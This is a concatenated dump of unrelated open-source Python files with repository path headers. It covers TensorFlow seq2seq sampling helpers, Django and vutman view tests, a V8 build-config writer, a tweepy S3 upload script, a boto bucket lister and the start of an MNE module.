def __init__(self, initialize_fn, sample_fn, next_inputs_fn,
sample_ids_shape=None, sample_ids_dtype=None):
"""Initializer.
Args:
initialize_fn: callable that returns `(finished, next_inputs)`
for the first iteration.
sample_fn: callable that takes `(time, outputs, state)`
and emits tensor `sample_ids`.
next_inputs_fn: callable that takes `(time, outputs, state, sample_ids)`
and emits `(finished, next_inputs, next_state)`.
sample_ids_shape: Either a list of integers, or a 1-D Tensor of type
`int32`, the shape of each value in the `sample_ids` batch. Defaults to
a scalar.
sample_ids_dtype: The dtype of the `sample_ids` tensor. Defaults to int32.
"""
self._initialize_fn = initialize_fn
self._sample_fn = sample_fn
self._next_inputs_fn = next_inputs_fn
self._batch_size = None
self._sample_ids_shape = tensor_shape.TensorShape(sample_ids_shape or [])
self._sample_ids_dtype = sample_ids_dtype or dtypes.int32
@property
def batch_size(self):
if self._batch_size is None:
raise ValueError("batch_size accessed before initialize was called")
return self._batch_size
@property
def sample_ids_shape(self):
return self._sample_ids_shape
@property
def sample_ids_dtype(self):
return self._sample_ids_dtype
def initialize(self, name=None):
with ops.name_scope(name, "%sInitialize" % type(self).__name__):
(finished, next_inputs) = self._initialize_fn()
if self._batch_size is None:
self._batch_size = array_ops.size(finished)
return (finished, next_inputs)
def sample(self, time, outputs, state, name=None):
with ops.name_scope(
name, "%sSample" % type(self).__name__, (time, outputs, state)):
return self._sample_fn(time=time, outputs=outputs, state=state)
def next_inputs(self, time, outputs, state, sample_ids, name=None):
with ops.name_scope(
name, "%sNextInputs" % type(self).__name__, (time, outputs, state)):
return self._next_inputs_fn(
time=time, outputs=outputs, state=state, sample_ids=sample_ids)
class TrainingHelper(Helper):
"""A helper for use during training. Only reads inputs.
Returned sample_ids are the argmax of the RNN output logits.
"""
def __init__(self, inputs, sequence_length, time_major=False, name=None):
"""Initializer.
Args:
inputs: A (structure of) input tensors.
sequence_length: An int32 vector tensor.
time_major: Python bool. Whether the tensors in `inputs` are time major.
If `False` (default), they are assumed to be batch major.
name: Name scope for any created operations.
Raises:
ValueError: if `sequence_length` is not a 1D tensor.
"""
with ops.name_scope(name, "TrainingHelper", [inputs, sequence_length]):
inputs = ops.convert_to_tensor(inputs, name="inputs")
self._inputs = inputs
if not time_major:
inputs = nest.map_structure(_transpose_batch_time, inputs)
self._input_tas = nest.map_structure(_unstack_ta, inputs)
self._sequence_length = ops.convert_to_tensor(
sequence_length, name="sequence_length")
if self._sequence_length.get_shape().ndims != 1:
raise ValueError(
"Expected sequence_length to be a vector, but received shape: %s" %
self._sequence_length.get_shape())
self._zero_inputs = nest.map_structure(
lambda inp: array_ops.zeros_like(inp[0, :]), inputs)
self._batch_size = array_ops.size(sequence_length)
@property
def inputs(self):
return self._inputs
@property
def sequence_length(self):
return self._sequence_length
@property
def batch_size(self):
return self._batch_size
@property
def sample_ids_shape(self):
return tensor_shape.TensorShape([])
@property
def sample_ids_dtype(self):
return dtypes.int32
def initialize(self, name=None):
with ops.name_scope(name, "TrainingHelperInitialize"):
finished = math_ops.equal(0, self._sequence_length)
all_finished = math_ops.reduce_all(finished)
next_inputs = control_flow_ops.cond(
all_finished, lambda: self._zero_inputs,
lambda: nest.map_structure(lambda inp: inp.read(0), self._input_tas))
return (finished, next_inputs)
def sample(self, time, outputs, name=None, **unused_kwargs):
with ops.name_scope(name, "TrainingHelperSample", [time, outputs]):
sample_ids = math_ops.cast(
math_ops.argmax(outputs, axis=-1), dtypes.int32)
return sample_ids
def next_inputs(self, time, outputs, state, name=None, **unused_kwargs):
"""next_inputs_fn for TrainingHelper."""
with ops.name_scope(name, "TrainingHelperNextInputs",
[time, outputs, state]):
next_time = time + 1
finished = (next_time >= self._sequence_length)
all_finished = math_ops.reduce_all(finished)
def read_from_ta(inp):
return inp.read(next_time)
next_inputs = control_flow_ops.cond(
all_finished, lambda: self._zero_inputs,
lambda: nest.map_structure(read_from_ta, self._input_tas))
return (finished, next_inputs, state)
class ScheduledEmbeddingTrainingHelper(TrainingHelper):
"""A training helper that adds scheduled sampling.
Returns -1s for sample_ids where no sampling took place; valid sample id
values elsewhere.
"""
def __init__(self, inputs, sequence_length, embedding, sampling_probability,
time_major=False, seed=None, scheduling_seed=None, name=None):
"""Initializer.
Args:
inputs: A (structure of) input tensors.
sequence_length: An int32 vector tensor.
embedding: A callable that takes a vector tensor of `ids` (argmax ids),
or the `params` argument for `embedding_lookup`.
sampling_probability: A 0D `float32` tensor: the probability of sampling
categorically from the output ids instead of reading directly from the
inputs.
time_major: Python bool. Whether the tensors in `inputs` are time major.
If `False` (default), they are assumed to be batch major.
seed: The sampling seed.
scheduling_seed: The schedule decision rule sampling seed.
name: Name scope for any created operations.
Raises:
ValueError: if `sampling_probability` is not a scalar or vector.
"""
with ops.name_scope(name, "ScheduledEmbeddingSamplingWrapper",
[embedding, sampling_probability]):
if callable(embedding):
self._embedding_fn = embedding
else:
self._embedding_fn = (
lambda ids: embedding_ops.embedding_lookup(embedding, ids))
self._sampling_probability = ops.convert_to_tensor(
sampling_probability, name="sampling_probability")
if self._sampling_probability.get_shape().ndims not in (0, 1):
raise ValueError(
"sampling_probability must be either a scalar or a vector. "
"saw shape: %s" % (self._sampling_probability.get_shape()))
self._seed = seed
self._scheduling_seed = scheduling_seed
super(ScheduledEmbeddingTrainingHelper, self).__init__(
inputs=inputs,
sequence_length=sequence_length,
time_major=time_major,
name=name)
def initialize(self, name=None):
return super(ScheduledEmbeddingTrainingHelper, self).initialize(name=name)
def sample(self, time, outputs, state, name=None):
with ops.name_scope(name, "ScheduledEmbeddingTrainingHelperSample",
[time, outputs, state]):
# Return -1s where we did not sample, and sample_ids elsewhere
select_sample = bernoulli_sample(
probs=self._sampling_probability,
dtype=dtypes.bool,
sample_shape=self.batch_size,
seed=self._scheduling_seed)
return array_ops.where(
select_sample,
categorical_sample(logits=outputs, seed=self._seed),
gen_array_ops.fill([self.batch_size], -1))
def next_inputs(self, time, outputs, state, sample_ids, name=None):
with ops.name_scope(name, "ScheduledEmbeddingTrainingHelperNextInputs",
[time, outputs, state, sample_ids]):
(finished, base_next_inputs, state) = (
super(ScheduledEmbeddingTrainingHelper, self).next_inputs(
time=time,
outputs=outputs,
state=state,
sample_ids=sample_ids,
name=name))
def maybe_sample():
"""Perform scheduled sampling."""
where_sampling = math_ops.cast(
array_ops.where(sample_ids > -1), dtypes.int32)
where_not_sampling = math_ops.cast(
array_ops.where(sample_ids <= -1), dtypes.int32)
sample_ids_sampling = array_ops.gather_nd(sample_ids, where_sampling)
inputs_not_sampling = array_ops.gather_nd(
base_next_inputs, where_not_sampling)
sampled_next_inputs = self._embedding_fn(sample_ids_sampling)
base_shape = array_ops.shape(base_next_inputs)
return (array_ops.scatter_nd(indices=where_sampling,
updates=sampled_next_inputs,
shape=base_shape)
+ array_ops.scatter_nd(indices=where_not_sampling,
updates=inputs_not_sampling,
shape=base_shape))
all_finished = math_ops.reduce_all(finished)
next_inputs = control_flow_ops.cond(
all_finished, lambda: base_next_inputs, maybe_sample)
return (finished, next_inputs, state)
class ScheduledOutputTrainingHelper(TrainingHelper):
"""A training helper that adds scheduled sampling directly to outputs.
Returns False for sample_ids where no sampling took place; True elsewhere.
"""
def __init__(self, inputs, sequence_length, sampling_probability,
time_major=False, seed=None, next_inputs_fn=None,
auxiliary_inputs=None, name=None):
"""Initializer.
Args:
inputs: A (structure) of input tensors.
sequence_length: An int32 vector tensor.
sampling_probability: A 0D `float32` tensor: the probability of sampling
from the outputs instead of reading directly from the inputs.
time_major: Python bool. Whether the tensors in `inputs` are time major.
If `False` (default), they are assumed to be batch major.
seed: The sampling seed.
next_inputs_fn: (Optional) callable to apply to the RNN outputs to create
the next input when sampling. If `None` (default), the RNN outputs will
be used as the next inputs.
auxiliary_inputs: An optional (structure of) auxiliary input tensors with
a shape that matches `inputs` in all but (potentially) the final
dimension. These tensors will be concatenated to the sampled output or
the `inputs` when not sampling for use as the next input.
name: Name scope for any created operations.
Raises:
ValueError: if `sampling_probability` is not a scalar or vector.
"""
with ops.name_scope(name, "ScheduledOutputTrainingHelper",
[inputs, auxiliary_inputs, sampling_probability]):
self._sampling_probability = ops.convert_to_tensor(
sampling_probability, name="sampling_probability")
if self._sampling_probability.get_shape().ndims not in (0, 1):
raise ValueError(
"sampling_probability must be either a scalar or a vector. "
"saw shape: %s" % (self._sampling_probability.get_shape()))
if auxiliary_inputs is None:
maybe_concatenated_inputs = inputs
else:
inputs = ops.convert_to_tensor(inputs, name="inputs")
auxiliary_inputs = ops.convert_to_tensor(
auxiliary_inputs, name="auxiliary_inputs")
maybe_concatenated_inputs = nest.map_structure(
lambda x, y: array_ops.concat((x, y), -1),
inputs, auxiliary_inputs)
if not time_major:
auxiliary_inputs = nest.map_structure(
_transpose_batch_time, auxiliary_inputs)
self._auxiliary_input_tas = (
nest.map_structure(_unstack_ta, auxiliary_inputs)
if auxiliary_inputs is not None else None)
self._seed = seed
self._next_inputs_fn = next_inputs_fn
super(ScheduledOutputTrainingHelper, self).__init__(
inputs=maybe_concatenated_inputs,
sequence_length=sequence_length,
time_major=time_major,
name=name)
def initialize(self, name=None):
return super(ScheduledOutputTrainingHelper, self).initialize(name=name)
def sample(self, time, outputs, state, name=None):
with ops.name_scope(name, "ScheduledOutputTrainingHelperSample",
[time, outputs, state]):
return bernoulli_sample(
probs=self._sampling_probability,
sample_shape=self.batch_size,
seed=self._seed)
def next_inputs(self, time, outputs, state, sample_ids, name=None):
with ops.name_scope(name, "ScheduledOutputTrainingHelperNextInputs",
[time, outputs, state, sample_ids]):
(finished, base_next_inputs, state) = (
super(ScheduledOutputTrainingHelper, self).next_inputs(
time=time,
outputs=outputs,
state=state,
sample_ids=sample_ids,
name=name))
sample_ids = math_ops.cast(sample_ids, dtypes.bool)
def maybe_sample():
"""Perform scheduled sampling."""
def maybe_concatenate_auxiliary_inputs(outputs_, indices=None):
"""Concatenate outputs with auxiliary inputs, if they exist."""
if self._auxiliary_input_tas is None:
return outputs_
next_time = time + 1
auxiliary_inputs = nest.map_structure(
lambda ta: ta.read(next_time), self._auxiliary_input_tas)
if indices is not None:
auxiliary_inputs = array_ops.gather_nd(auxiliary_inputs, indices)
return nest.map_structure(
lambda x, y: array_ops.concat((x, y), -1),
outputs_, auxiliary_inputs)
if self._next_inputs_fn is None:
return array_ops.where(
sample_ids, maybe_concatenate_auxiliary_inputs(outputs),
base_next_inputs)
where_sampling = math_ops.cast(
array_ops.where(sample_ids), dtypes.int32)
where_not_sampling = math_ops.cast(
array_ops.where(math_ops.logical_not(sample_ids)), dtypes.int32)
outputs_sampling = array_ops.gather_nd(outputs, where_sampling)
inputs_not_sampling = array_ops.gather_nd(base_next_inputs,
where_not_sampling)
sampled_next_inputs = maybe_concatenate_auxiliary_inputs(
self._next_inputs_fn(outputs_sampling), where_sampling)
base_shape = array_ops.shape(base_next_inputs)
return (array_ops.scatter_nd(indices=where_sampling,
updates=sampled_next_inputs,
shape=base_shape)
+ array_ops.scatter_nd(indices=where_not_sampling,
updates=inputs_not_sampling,
shape=base_shape))
all_finished = math_ops.reduce_all(finished)
no_samples = math_ops.logical_not(math_ops.reduce_any(sample_ids))
next_inputs = control_flow_ops.cond(
math_ops.logical_or(all_finished, no_samples),
lambda: base_next_inputs, maybe_sample)
return (finished, next_inputs, state)
class GreedyEmbeddingHelper(Helper):
"""A helper for use during inference.
Uses the argmax of the output (treated as logits) and passes the
result through an embedding layer to get the next input.
"""
def __init__(self, embedding, start_tokens, end_token):
"""Initializer.
Args:
embedding: A callable that takes a vector tensor of `ids` (argmax ids),
or the `params` argument for `embedding_lookup`. The returned tensor
will be passed to the decoder input.
start_tokens: `int32` vector shaped `[batch_size]`, the start tokens.
end_token: `int32` scalar, the token that marks end of decoding.
Raises:
ValueError: if `start_tokens` is not a 1D tensor or `end_token` is not a
scalar.
"""
if callable(embedding):
self._embedding_fn = embedding
else:
self._embedding_fn = (
lambda ids: embedding_ops.embedding_lookup(embedding, ids))
self._start_tokens = ops.convert_to_tensor(
start_tokens, dtype=dtypes.int32, name="start_tokens")
self._end_token = ops.convert_to_tensor(
end_token, dtype=dtypes.int32, name="end_token")
if self._start_tokens.get_shape().ndims != 1:
raise ValueError("start_tokens must be a vector")
self._batch_size = array_ops.size(start_tokens)
if self._end_token.get_shape().ndims != 0:
raise ValueError("end_token must be a scalar")
self._start_inputs = self._embedding_fn(self._start_tokens)
@property
def batch_size(self):
return self._batch_size
@property
def sample_ids_shape(self):
return tensor_shape.TensorShape([])
@property
def sample_ids_dtype(self):
return dtypes.int32
def initialize(self, name=None):
finished = array_ops.tile([False], [self._batch_size])
return (finished, self._start_inputs)
def sample(self, time, outputs, state, name=None):
"""sample for GreedyEmbeddingHelper."""
del time, state # unused by sample_fn
# Outputs are logits, use argmax to get the most probable id
if not isinstance(outputs, ops.Tensor):
raise TypeError("Expected outputs to be a single Tensor, got: %s" %
type(outputs))
sample_ids = math_ops.argmax(outputs, axis=-1, output_type=dtypes.int32)
return sample_ids
def next_inputs(self, time, outputs, state, sample_ids, name=None):
"""next_inputs_fn for GreedyEmbeddingHelper."""
del time, outputs # unused by next_inputs_fn
finished = math_ops.equal(sample_ids, self._end_token)
all_finished = math_ops.reduce_all(finished)
next_inputs = control_flow_ops.cond(
all_finished,
# If we're finished, the next_inputs value doesn't matter
lambda: self._start_inputs,
lambda: self._embedding_fn(sample_ids))
return (finished, next_inputs, state)
class SampleEmbeddingHelper(GreedyEmbeddingHelper):
"""A helper for use during inference.
Uses sampling (from a distribution) instead of argmax and passes the
result through an embedding layer to get the next input.
"""
def __init__(self, embedding, start_tokens, end_token,
softmax_temperature=None, seed=None):
"""Initializer.
Args:
embedding: A callable that takes a vector tensor of `ids` (argmax ids),
or the `params` argument for `embedding_lookup`. The returned tensor
will be passed to the decoder input.
start_tokens: `int32` vector shaped `[batch_size]`, the start tokens.
end_token: `int32` scalar, the token that marks end of decoding.
softmax_temperature: (Optional) `float32` scalar, value to divide the
logits by before computing the softmax. Larger values (above 1.0) result
in more random samples, while smaller values push the sampling
distribution towards the argmax. Must be strictly greater than 0.
Defaults to 1.0.
seed: (Optional) The sampling seed.
Raises:
ValueError: if `start_tokens` is not a 1D tensor or `end_token` is not a
scalar.
"""
super(SampleEmbeddingHelper, self).__init__(
embedding, start_tokens, end_token)
self._softmax_temperature = softmax_temperature
self._seed = seed
def sample(self, time, outputs, state, name=None):
"""sample for SampleEmbeddingHelper."""
del time, state # unused by sample_fn
# Outputs are logits, we sample instead of argmax (greedy).
if not isinstance(outputs, ops.Tensor):
raise TypeError("Expected outputs to be a single Tensor, got: %s" %
type(outputs))
if self._softmax_temperature is None:
logits = outputs
else:
logits = outputs / self._softmax_temperature
sample_ids = categorical_sample(logits=logits, seed=self._seed)
return sample_ids
class InferenceHelper(Helper):
"""A helper to use during inference with a custom sampling function."""
def __init__(self, sample_fn, sample_shape, sample_dtype,
start_inputs, end_fn, next_inputs_fn=None):
"""Initializer.
Args:
sample_fn: A callable that takes `outputs` and emits tensor `sample_ids`.
sample_shape: Either a list of integers, or a 1-D Tensor of type `int32`,
the shape of the each sample in the batch returned by `sample_fn`.
sample_dtype: the dtype of the sample returned by `sample_fn`.
start_inputs: The initial batch of inputs.
end_fn: A callable that takes `sample_ids` and emits a `bool` vector
shaped `[batch_size]` indicating whether each sample is an end token.
next_inputs_fn: (Optional) A callable that takes `sample_ids` and returns
the next batch of inputs. If not provided, `sample_ids` is used as the
next batch of inputs.
"""
self._sample_fn = sample_fn
self._end_fn = end_fn
self._sample_shape = tensor_shape.TensorShape(sample_shape)
self._sample_dtype = sample_dtype
self._next_inputs_fn = next_inputs_fn
self._batch_size = array_ops.shape(start_inputs)[0]
self._start_inputs = ops.convert_to_tensor(
start_inputs, name="start_inputs")
@property
def batch_size(self):
return self._batch_size
@property
def sample_ids_shape(self):
return self._sample_shape
@property
def sample_ids_dtype(self):
return self._sample_dtype
def initialize(self, name=None):
finished = array_ops.tile([False], [self._batch_size])
return (finished, self._start_inputs)
def sample(self, time, outputs, state, name=None):
del time, state # unused by sample
return self._sample_fn(outputs)
def next_inputs(self, time, outputs, state, sample_ids, name=None):
del time, outputs # unused by next_inputs
if self._next_inputs_fn is None:
next_inputs = sample_ids
else:
next_inputs = self._next_inputs_fn(sample_ids)
finished = self._end_fn(sample_ids)
return (finished, next_inputs, state)
|
mentosso/pyobd-pi
|
refs/heads/master
|
debugEvent.py
|
18
|
#!/usr/bin/env python
###########################################################################
# obd_sensors.py
#
# Copyright 2004 Donour Sizemore (donour@uchicago.edu)
# Copyright 2009 Secons Ltd. (www.obdtester.com)
#
# This file is part of pyOBD.
#
# pyOBD is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pyOBD is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyOBD; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
###########################################################################
try:
import wx
EVT_DEBUG_ID = 1010
def debug_display(window, position, message):
if window is None:
print message
else:
wx.PostEvent(window, DebugEvent([position, message]))
class DebugEvent(wx.PyEvent):
"""Simple event to carry arbitrary result data."""
def __init__(self, data):
"""Init Result Event."""
wx.PyEvent.__init__(self)
self.SetEventType(EVT_DEBUG_ID)
self.data = data
except ImportError as e:
def debug_display(window, position, message):
print message
|
fafaman/django
|
refs/heads/master
|
tests/webdesign_tests/tests.py
|
251
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.template import Context, Template
from django.test import SimpleTestCase, modify_settings
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.webdesign'})
class WebdesignTest(SimpleTestCase):
def test_lorem_tag(self):
t = Template("{% load webdesign %}{% lorem 3 w %}")
self.assertEqual(t.render(Context({})),
'lorem ipsum dolor')
|
hoho/dosido
|
refs/heads/master
|
nodejs/deps/v8/tools/testrunner/utils/dump_build_config.py
|
11
|
# Copyright 2016 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Writes a dictionary to a json file with the passed key-value pairs.
Expected to be called like:
dump_build_config.py path/to/file.json [key1=value1 ...]
The values are expected to be valid json. E.g. true is a boolean and "true" is
the string "true".
"""
import json
import os
import sys
assert len(sys.argv) > 1
def as_json(kv):
assert '=' in kv
k, v = kv.split('=', 1)
return k, json.loads(v)
with open(sys.argv[1], 'w') as f:
json.dump(dict(as_json(kv) for kv in sys.argv[2:]), f)
|
daniellawrence/django-vutman
|
refs/heads/master
|
tests/test_view.py
|
1
|
from django.test import TestCase, Client
from vutman.models import EmailAlias, EmailUser, EmailDomain, EmailServer
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
class SimpleTestCase(TestCase):
def setUp(self):
self.client = Client()
self.request_user = User.objects.create_user('admin',
'admin@local.host',
'password'
)
self.request_user.save()
self.client.login(username="admin",
password="password")
self.server = EmailServer.objects.create(email_server="server")
self.domain = EmailDomain.objects.create(domain_name="domain")
self.user = EmailUser.objects.create(
username="username",
fullname="first last",
email_server=self.server,
active_directory_basedn="basedn"
)
self.alias = EmailAlias.objects.create(
alias_name="alias",
username=self.user,
email_domain=self.domain
)
self.user2 = EmailUser.objects.create(
username="username2",
fullname="first last2",
email_server=self.server,
active_directory_basedn="basedn2"
)
self.alias2 = EmailAlias.objects.create(
alias_name="alias2",
username=self.user2,
email_domain=self.domain
)
def test_index_access_login(self):
self.client.login(username="admin",
password="password")
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
def test_search_no_q(self):
response = self.client.get(reverse('search'), args=[])
self.assertEqual(response.context, None)
self.assertEqual(response.status_code, 302)
def test_search_bad_q(self):
response = self.client.get(reverse('search'), args={'q': 'BAD_SEARCH'})
self.assertEqual(response.context, None)
self.assertEqual(response.status_code, 302)
response = self.client.get(reverse('search'), args={'q': ''})
self.assertEqual(response.context, None)
self.assertEqual(response.status_code, 302)
response = self.client.get(reverse('search'), args={'q': None})
self.assertEqual(response.context, None)
self.assertEqual(response.status_code, 302)
def test_search_good(self):
response = self.client.get(reverse('search'),
{'q': 'a', 'alias': 'on', 'user': 'on'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['all_list']), 4)
self.assertEqual(len(response.context[-1]['alias_list']), 2)
self.assertEqual(len(response.context[-1]['user_list']), 2)
def test_search_good_find_nothing_redirect_index(self):
response = self.client.get(reverse('search'), {
'q': 'WILL_NOT_MATCH', 'alias': 'on', 'user': 'on'
})
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
def test_search_good_find_single_user_redirect_to_page(self):
response = self.client.get(reverse('search'), {
'q': 'username2', 'alias': 'on', 'user': 'on'
})
self.assertEqual(response.status_code, 302)
self.assertIn(self.user2.get_absolute_url(), response.url)
self.assertIn('one_user', response.url)
def test_search_good_find_single_alias_redirect_to_page(self):
response = self.client.get(reverse('search'), {
'q': 'alias2', 'alias': 'on', 'user': 'on'
})
self.assertEqual(response.status_code, 302)
self.assertIn(self.user2.get_absolute_url(), response.url)
self.assertIn('one_alias', response.url)
def test_search_only_aliases(self):
response = self.client.get(reverse('search'),
{'q': 'a', 'alias': 'on'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['all_list']), 2)
self.assertEqual(len(response.context[-1]['alias_list']), 2)
self.assertEqual(len(response.context[-1]['user_list']), 0)
def test_search_only_users(self):
response = self.client.get(reverse('search'),
{'q': 'a', 'user': 'on'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['all_list']), 2)
self.assertEqual(len(response.context[-1]['alias_list']), 0)
self.assertEqual(len(response.context[-1]['user_list']), 2)
def test_search_1users_many_aliases(self):
# domain = EmailDomain.objects.create(email_server="domain2")
EmailUser.objects.create(
username="domain21",
fullname="first last",
email_server=self.server,
active_directory_basedn="basedn"
).save()
EmailUser.objects.create(
username="domain",
fullname="first last",
email_server=self.server,
active_directory_basedn="basedn"
).save()
EmailAlias.objects.create(
alias_name="domain2",
username=self.user2,
email_domain=self.domain
).save()
EmailAlias.objects.create(
alias_name="domain21",
username=self.user,
email_domain=self.domain
).save()
response = self.client.get(
reverse('search'),
{
'q': 'domain2', 'user': 'on', 'alias': 'on'
}
)
self.assertEqual(response.status_code, 200)
def test_render_vut(self):
response = self.client.get(reverse('render_vut'))
self.assertEqual(response.status_code, 200)
# self.assertEqual(len(response.context[-1]['alias_list']), 2)
def test_emailuser_details(self):
response = self.client.get(self.user.get_absolute_url())
self.assertEqual(response.status_code, 200)
def test_emailalias_delete(self):
response = self.client.get(reverse('emailalias.delete',
kwargs={'pk': self.alias.pk}))
# messages = self.client.get_and_delete_messages()
# print(messages)
self.assertEqual(response.status_code, 302)
self.assertIn(self.user.get_absolute_url(), response.url)
def test_emailalias_delete_missing_id(self):
response = self.client.get(reverse('emailalias.delete',
kwargs={'pk': 10000}))
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
def test_emaildetails_get(self):
response = self.client.get(self.user.get_absolute_url())
self.assertEqual(response.status_code, 200)
response = self.client.get(self.user.get_absolute_url(),
{'pk': self.user.pk})
self.assertEqual(response.status_code, 200)
response = self.client.post(self.user.get_absolute_url(),
{'pk': self.user.pk})
self.assertEqual(response.status_code, 200)
def test_aliasdetails_via_bad_post(self):
response = self.client.post(
reverse('emailalias.details', kwargs={'pk': self.alias.pk}),
{}
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.alias.username.get_absolute_url(), response.url)
def test_aliasdetails_via_ok_post(self):
response = self.client.post(
reverse('emailalias.details', kwargs={'pk': self.alias.pk}),
{'pk': self.alias.pk, 'username': self.user.pk},
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.alias.username.get_absolute_url(), response.url)
def test_aliasdetails_via_good_post(self):
response = self.client.post(
reverse('emailalias.details', kwargs={'pk': self.alias.pk}),
{
'pk': self.alias.pk,
'username': self.user.pk,
'email_domain': self.domain.pk,
'alias_name': 'alias_name',
'state': 'E'
},
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.alias.username.get_absolute_url(), response.url)
def test_aliasdetails_via_good_post_no_pk(self):
response = self.client.post(
reverse('emailalias.new'),
{
# 'pk': self.alias.pk,
'username': self.user.pk,
'email_domain': self.domain.pk,
'alias_name': 'alias_name',
'state': 'E'
},
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.alias.username.get_absolute_url(), response.url)
def test_aliasdetails_via_good_post_via_userdetails(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
{
'pk': self.alias.pk,
'username': self.user.pk,
'email_domain': self.domain.pk,
'alias_name': 'new_alias_name_via_post',
'state': 'E'
},
)
self.assertEqual(response.status_code, 200)
def test_userdetails_via_post(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
{}
)
self.assertEqual(response.status_code, 200)
def test_userdetails_via_post_bad_pk(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': 10000}),
{}
)
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
def test_userdetails_via_post_good_pk(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
)
self.assertEqual(response.status_code, 200)
def test_userdetails_via_post_good_form(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
{
'pk': self.user.pk,
'username': 'new_username_set_by_post',
'email_server': self.server.pk,
'full_name': 'new_fullname_set_by_post',
'state': 'E'
}
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.user.get_absolute_url(), response.url)
def test_userdetails_via_post_bad_alias(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
{
'alias_name': None,
}
)
self.assertEqual(response.status_code, 200)
def test_userdetails_via_post_good_form_to_user_user(self):
response = self.client.post(reverse('emailuser.new'), {
'username': 'new_username_set_by_post',
'email_server': self.server.pk,
'full_name': 'new_fullname_set_by_post',
'state': 'E'
}, follow=True)
# self.assertIn(EmailUser(pk=3).get_absolute_url(), response.path)
self.assertEqual(response.status_code, 200)
def test_userdetails_has_new_form(self):
response = self.client.get(reverse('emailuser.new'))
self.assertEqual(response.status_code, 200)
def test_emailuser_delete(self):
response = self.client.get(reverse('emailuser.delete',
kwargs={'pk': self.user.pk}))
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
def test_emailuser_delete_missing_id(self):
response = self.client.get(reverse('emailuser.delete',
kwargs={'pk': 10000}))
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
|
aashish24/tweepy
|
refs/heads/master
|
upload_record.py
|
6
|
import boto
from boto.s3.key import Key
from os import environ as env
conn = boto.connect_s3()
bucket = conn.get_bucket(env['AWS_BUCKET'])
k = bucket.get_key('record', validate=False)
k.set_contents_from_filename('tests/record.json')
k.set_acl('public-read')
k.close(fast=True)
|
aleonliao/depot_tools
|
refs/heads/master
|
third_party/boto/gs/bucketlistresultset.py
|
68
|
# Copyright 2012 Google Inc.
# Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
def versioned_bucket_lister(bucket, prefix='', delimiter='',
marker='', generation_marker='', headers=None):
"""
A generator function for listing versioned objects.
"""
more_results = True
k = None
while more_results:
rs = bucket.get_all_versions(prefix=prefix, marker=marker,
generation_marker=generation_marker,
delimiter=delimiter, headers=headers,
max_keys=999)
for k in rs:
yield k
marker = rs.next_marker
generation_marker = rs.next_generation_marker
more_results= rs.is_truncated
class VersionedBucketListResultSet:
"""
A resultset for listing versions within a bucket. Uses the bucket_lister
generator function and implements the iterator interface. This
transparently handles the results paging from GCS so even if you have
many thousands of keys within the bucket you can iterate over all
keys in a reasonably efficient manner.
"""
def __init__(self, bucket=None, prefix='', delimiter='', marker='',
generation_marker='', headers=None):
self.bucket = bucket
self.prefix = prefix
self.delimiter = delimiter
self.marker = marker
self.generation_marker = generation_marker
self.headers = headers
def __iter__(self):
return versioned_bucket_lister(self.bucket, prefix=self.prefix,
delimiter=self.delimiter,
marker=self.marker,
generation_marker=self.generation_marker,
headers=self.headers)
|
bloyl/mne-python
|
refs/heads/placeholder
|
mne/source_space.py
|
4
|
# Authors: Matti Hämäläinen <msh@nmr.mgh.harvard.edu>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD (3-clause)
# Many of the computations in this code were derived from Matti Hämäläinen's
# C code.
from copy import deepcopy
from functools import partial
from gzip import GzipFile
import os
import os.path as op
import numpy as np
from .io.constants import FIFF
from .io.meas_info import create_info, Info, read_fiducials
